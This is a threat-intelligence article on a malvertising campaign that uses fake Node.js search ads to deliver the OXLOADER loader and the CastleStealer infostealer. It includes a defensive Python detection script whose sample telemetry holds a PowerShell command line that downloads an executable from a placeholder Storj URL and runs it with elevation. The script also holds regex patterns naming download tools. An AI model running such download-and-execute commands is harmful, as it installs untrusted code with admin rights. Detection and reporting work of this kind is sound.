OXLOADER Emerges: New Malvertising Campaign Delivers CastleStealer via Obfuscated Loader
Cybersecurity researchers have uncovered a sophisticated malvertising campaign, dubbed REF8372, that leverages malicious Google Ads to distribute the previously unknown malware loader **OXLOADER**. This new loader then stages and executes **CastleStealer**, a potent information stealer, employing advanced obfuscation and anti-analysis techniques to evade detection.
A new malvertising campaign is actively deploying a novel malware loader, **OXLOADER**, which subsequently delivers the **CastleStealer** information stealer. The campaign, tracked as **REF8372** by **Elastic Security Labs**, initiates through deceptive **Google Ads** targeting unsuspecting users.
Evidence suggests the threat actor behind **REF8372** is likely Russian-speaking and financially motivated, indicated by explicit exclusions designed to prevent infections within the Commonwealth of Independent States (CIS) region.
### Sophisticated Evasion Techniques
**OXLOADER** is engineered with multiple layers of obfuscation, including control-flow flattening, opaque predicates, and mixed Boolean-arithmetic (MBA) expressions. It also uses self-modifying decryption stubs and abuses the `.reloc` section of Windows PE files for shellcode staging, as detailed by researchers Daniel Stepanic and Jia Yu Chan.
### The Attack Chain
The attack begins when users search for queries such as "lts version of node.js" on search engines. Malicious **Google Ads**, published under a verified advertiser name written in Cyrillic script (purportedly based in Ukraine), redirect users to a fake website, `node-js[.]prentiva99[.]info`.
It remains unclear whether the advertiser account is directly linked to the threat actor or is a compromised or purchased identity. **Google** removed the advertiser account and its associated campaigns on May 14, 2026.
Users interacting with the fake site are served a batch script hosted on **Storj**, a decentralized cloud storage platform. This abuse of legitimate services like **Storj** highlights a growing trend among threat actors to circumvent domain-based reputation filters.

Executing the batch script displays a deceptive installation wizard UI while silently downloading the **OXLOADER** executable, also hosted on **Storj**, via a **PowerShell** command. This command passes `-Verb RunAs` to `Start-Process`, which triggers a **Windows User Account Control (UAC)** prompt and, if approved, runs the loader with elevated privileges.

**OXLOADER** then employs **DLL side-loading** to launch a rogue DLL, which decrypts and executes the **CastleStealer** payload. Beyond control-flow flattening (CFF) and mixed Boolean-arithmetic (MBA), **OXLOADER** also incorporates anti-VM measures to detect and avoid sandboxed environments, further hindering analysis.
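The batch-to-PowerShell stage and the DLL side-loading step described above can be expressed as endpoint detection heuristics. The following is an added example written for this article, not code or rules from Elastic Security Labs; the Sysmon-style event fields, the Storj gateway hostname and all sample paths and URLs are assumptions.

```python
# Added example: heuristics for the REF8372 delivery chain, run over constructed
# Sysmon-style events. Field names and the Storj gateway host are assumptions.
import ntpath
import re

STORJ_HOST = re.compile(r"storjshare\.io|\.storj\.io", re.I)     # assumed Storj hosts
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|Net\.WebClient|\bcurl\b", re.I)
ELEVATE = re.compile(r"-Verb\s+RunAs", re.I)                      # UAC prompt trigger
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData)\\", re.I)

def flag_process(ev):
    """Reasons a process-creation event matches the batch -> PowerShell stage."""
    reasons = []
    parent, image = ev.get("parent_image", "").lower(), ev.get("image", "").lower()
    cmd = ev.get("command_line", "")
    if image.endswith("powershell.exe") and parent.endswith("cmd.exe"):
        if ELEVATE.search(cmd):
            reasons.append("cmd.exe child requests UAC elevation via -Verb RunAs")
        if DOWNLOAD.search(cmd) and STORJ_HOST.search(cmd):
            reasons.append("PowerShell download from Storj-hosted URL")
    return reasons

def flag_image_load(ev):
    """Side-loading hint: an executable in a user-writable directory loads an
    unsigned DLL from its own directory (ntpath handles Windows paths anywhere)."""
    image, loaded = ev.get("image", ""), ev.get("image_loaded", "")
    same_dir = ntpath.dirname(image).lower() == ntpath.dirname(loaded).lower()
    if (loaded.lower().endswith(".dll") and same_dir and not ev.get("signed", True)
            and USER_WRITABLE.search(image)):
        return ["unsigned DLL side-loaded from user-writable directory"]
    return []

def scan(events):
    """Return (event_id, reasons) for every event that matched a heuristic."""
    hits = []
    for ev in events:
        reasons = flag_process(ev) if ev["type"] == "process" else flag_image_load(ev)
        if reasons:
            hits.append((ev["id"], reasons))
    return hits

# Constructed sample telemetry (paths, names and URL are placeholders).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": 'powershell -c "iwr https://link.storjshare.io/EXAMPLE/setup.exe '
                     '-o $env:TEMP\\setup.exe; Start-Process $env:TEMP\\setup.exe -Verb RunAs"'},
    {"id": 2, "type": "process", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell -c Get-Date"},
    {"id": 3, "type": "image_load", "image": r"C:\Users\u\AppData\Local\Temp\Setup\setup.exe",
     "image_loaded": r"C:\Users\u\AppData\Local\Temp\Setup\helper.dll", "signed": False},
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(event_id, reasons)
```

The two heuristics are intentionally independent so either stage of the chain is surfaced even when the other is missed or logged differently.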
### CastleStealer's Continued Presence
**CastleStealer** is a .NET information stealer that has been observed in other campaigns, notably distributed alongside **CastleLoader** through a **ClickFix**-style lure masquerading as a free image-editing tool in a campaign known as **BackgroundFix**. **CastleLoader** itself is attributed to **GrayBravo**, a known threat activity cluster.
**Elastic Security Labs** emphasizes the sophistication of **OXLOADER**, stating, "**OXLOADER** is in an early operational phase, but the engineering behind it suggests this family is worth watching. The code obfuscation, anti-VM measures, benign-looking code used to masquerade its binaries, and unique staging techniques reflect deliberate engineering choices to evade analysis."
This investment in evasion is proving effective, resulting in low detection rates across static engines and detonation runs, allowing **OXLOADER** a significant operational window before it is fully recognized and countered.